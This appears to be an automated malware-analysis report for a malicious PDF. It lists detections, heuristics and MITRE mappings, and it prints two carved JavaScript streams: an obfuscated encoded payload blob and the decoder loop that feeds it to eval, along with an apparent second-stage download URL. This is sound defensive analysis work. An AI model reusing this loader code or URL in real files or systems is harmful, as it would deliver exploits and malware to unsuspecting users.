MALICIOUS
218
Risk Score
Malware Insights
MITRE ATT&CK
T1059.007 JavaScript
T1203 Exploitation for Client Execution
T1566.001 Spearphishing Attachment
The PDF file contains embedded JavaScript that utilizes String.fromCharCode and eval() to decode and execute a payload. This JavaScript is obfuscated and attempts to exploit a known PDF vulnerability. The embedded URL http://d2F.QK/_-a is likely used to download a secondary payload. The ML classifier and ClamAV detection strongly indicate malicious intent.
Machine Learning
- Nyx PDF Classifier malicious score 1.0000
Heuristics 6
-
ClamAV: Pdf.Exploit.Agent-13669 critical CLAMAV_DETECTIONClamAV detected this file as malware: Pdf.Exploit.Agent-13669
-
JavaScript action low 2 related findings PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTERPDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.Matched line in script
eval(xsxpy6); -
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://d2F.QK/_-a Referenced by PDF JavaScript
🗂 Part of campaign:
d2f.qk
21 samples
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
javascript_obj111711_000.js |
pdf-javascript-stream | PDF /JS object 111711 at offset 0x197 | 2597 bytes |
SHA-256: 0ce0766492770bfae96f88212f963a05a78e85652a4509d6615135f5797a9edb |
|||
Preview scriptFirst 1,000 lines of the extracted script
yvcrg="0F1-1]1f2Z1d2d1b3]1`2h1^3?3Q1X1Y2J2]1<1U3L1M1P1Q3f3h1N3.3;1E1H1I33351F2W2Y1?1B3T1@3E3G1=3A3I1819273X1013142L2T112U2V1.383b0^1*3`0i2b0e0f3R3Y0c3a0a3[0_2g3+0Q0Z3K0T0W3_0U3S3c0R2f3V0O2[0K0L242R0I3^0G2X3-000=0B2O0@2^0>3Z3d090:3M3P072_053N032S0131370,0-2`3O0*2a2c";gzczkqg7="A602ZBDFJcKb=gLj00C8hY7MM]T1D70SDG3?TD^IDPMaGJ^eBhNEeGY0Jcg2:j@7=I<9Ca-9SQdYS_ID5,1NK<5cMI=Wc_11K,.38ZCh6:h-L=V0I=7MMZK-<FH.38ZCh6:F<GJ^eCiI2BiD-7;_IHJH]7h8N7VKE^Bcg2:E@L-1<=V0I=7MMZ_Q1K,7?<9@==9`]aMgjU@fGKMg9e_7LL_fH7+[c:K,5P-.PC8b@VX282KbA`0=Dh9.3NV,.ZX8K6?Q:JTCN2*Eg2**.3OZ+,EGgR<=JXK8W:2<Z+4.?gJK96,N2/5+,4-^2;O^T:OJg]._Z9K96*>34`JK5+h_3dLT:NT@,.[@G,CSPZJ*-R:1*.2CAGK*GEB:**2=DJe.XfIK**1:P?*2=[CV3fWC,CW,ZJ*-R=,J.3cGg2**.3@R+,@_@:J*-R=[*.3fWC,CW,ZJ*-R<=J,.+`HK9C:V35+>K*5_R:**2<SQK,4V*:Qi1:NLXS,DCER<QEV32R@K9.*:QX`N3E4/K**,ZP/*2:@?U,*f,ZJ**:PVg>3:YXK*5J:J**:P+KB:@?U,*f8K***K*-P:J+^2=@H4.RAb:J8^B:**2=[B@.haVK/I:V2**@.ZR+,*16K5JU@.-8C,D^[:O,ie.+aE,**+,?UKB=0,].**G,H2*K9GU2=7R@.**G,B>*K9-YK***K4`*2<aL].**G,H2*K9GU2=7R@.**G,<F*:J8U_3f4/K3B4N2+Ha.**,.TCc:LU*.3jK_32UT:PP@e.Saf,<4/R=[*.3fWC,@]KB:**V3K:,./ODZJ8ZV2**.3U9/,>5fR:,c.2**.3JB@./ODZJ8^R:**2:*dN2*F].`QLK4/h_2-Va.**,.g@/K9GU2;Q>5,**/K64*:J+^2<c4`K*^P:PVg>3:YXK*GPZJ**:ODc@.[JVK**1:JUJ,.]XA:P6^B=-6/,>OQZJ**:J**:J**:J**:J**:J**:J**:J**:QCC>3OO@K8Xf2=*>.2Tb8K58fc<`*,.db?K5>e_3[H/,Fd;B;:O/K*,^R=VVT.Z/@K8TRV3Cb<K8W`R=V>@.?3>R=/*.3ag4.?hVK8Oa:KKJ+,?5cR<TY/,>,::LVCV2>?ER=[??,<G>>2CW*K*,?2:**2:^*O,*?[N2**.2]fXK9Z3:J/FC,**+,4-^2=d4i.G<Q:KP+4.*UM2:**2:]ffR:,XU,**+,+3O_2c^gK**,ZM-*,.,=5R;[Qd,**/K6**K0A66K9Z3:J/FC,**+,CU-2<c]=R=8CG,IJ<K*4c].**,.SbLK5OH4.U=1:M8U4.?E+:PD/R==5<K6b;:O^K<K*OR:K?IN2**@.Nc*K+GAR;ObG,D/1:J<*V2eYd,**/K9.*:M5TG,IJ<K*4c].**,._]NR:*F.2**.2**.2**.2**.2**.2**.2**.3cJ,.FCi:J*+B=8*2=I[>3@XI,?U@V3Pd@.+^-2=ZSV2BC5B:,TW,EGSN3P>O,@SKB<`EA:KGWV3DOU:J+DN3KF].WD`2;<XU,G=WK8G`B=5GD.Wb?K8SZR<^X].>*+,Gb@K/*U2:XhD.?jC,*1C,45_R;>XG,/bYK8h::J*R2;?Xi.>,U:KD]C,F>WB;;HG,Fd;B;@G4.db@K/<?4.5TS:QEZR;<L`K8SZR=T/U,4*XZLJfc=K<U,<e?_22**gAP[[c:K,5P-.@0gYB*9dg:F<CNfGD]diEeG1aLZKd2?VFH.2:LdJ[0iQ<-L*`a***,0_;eV7dHZ*I^cKe2-A5f^Bcg2:K/^+L=V0I=.1.:fUeM3WHQL..*JK+*2-[HE11K,.38ZCh6:F<U>`Pi`71Vf+Q_[f2b_fHE11K,.2XB6<E/iEKVhO<-L9:DZR/*R/,0_:0XZ**+H2EC*Df***-Bcg2:K4U;L9?^+L5OeKU7:XQ282-BLdHRD^>5S]5cNa5gb-Cf4WL5OeKU7:XQ2HM_<gD-MZK,.2;JZ_dXO]h:`PRA=Pf2838ZCh6:h.PC8b@VXE11K,.2D=MZK,.A602_1UhBI0A[i:F;-XYT6P`eH2*;cY7MMZK,.9`M>b_M`R9AeZi6YMhiEeG1aLZLi2-AB*,g_1UhBI0A[i:h-L7+ej@1[OgIWMMZK,.D-`iV9M5cj282H-di9+-_;R9AeZi6YMhVFH.2:M3SQedE;iI`UGXZ[i1hD0[;DGHW+ej@1[OgIbP[[c:KS*";yrgwf3=2751;function kvdpe(cpeldn8){if(cpeldn8>92)cpeldn8--;return cpeldn8-42}aqhtk=new Array();
|
|||
javascript_obj111712_001.js |
pdf-javascript-stream | PDF /JS object 111712 at offset 0x8DD | 510 bytes |
SHA-256: 7704a071024a6d9189b8ddc2f9ed2cf69f39ef0498e56e11d799542a52426212 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 1 eval/decoder/string-building token(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
function GetCode(arg){var ar=String.fromCharCode(arg,131,130).split('');var an=ar.pop();var an=ar.pop();return ar.join('');}while(yvcrg.length){aqhtk.push((kvdpe(yvcrg.charCodeAt(0))<<(4+2))+kvdpe(yvcrg.charCodeAt(1))-(500+12));yvcrg=yvcrg.slice(2,yvcrg.length)}ephwb2=jodqgp=yvcrg=0;xsxpy6='';function xzcmgs(){if(yvcrg==0){jodqgp=kvdpe(gzczkqg7.charCodeAt(ephwb2++));yvcrg=6;}return ((jodqgp>>--yvcrg)&0x01);}while(yrgwf3--){i=0;while(aqhtk[i]<0){if(xzcmgs())i=-aqhtk[i];else i++;}xsxpy6+=GetCode(aqhtk[i]);}
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.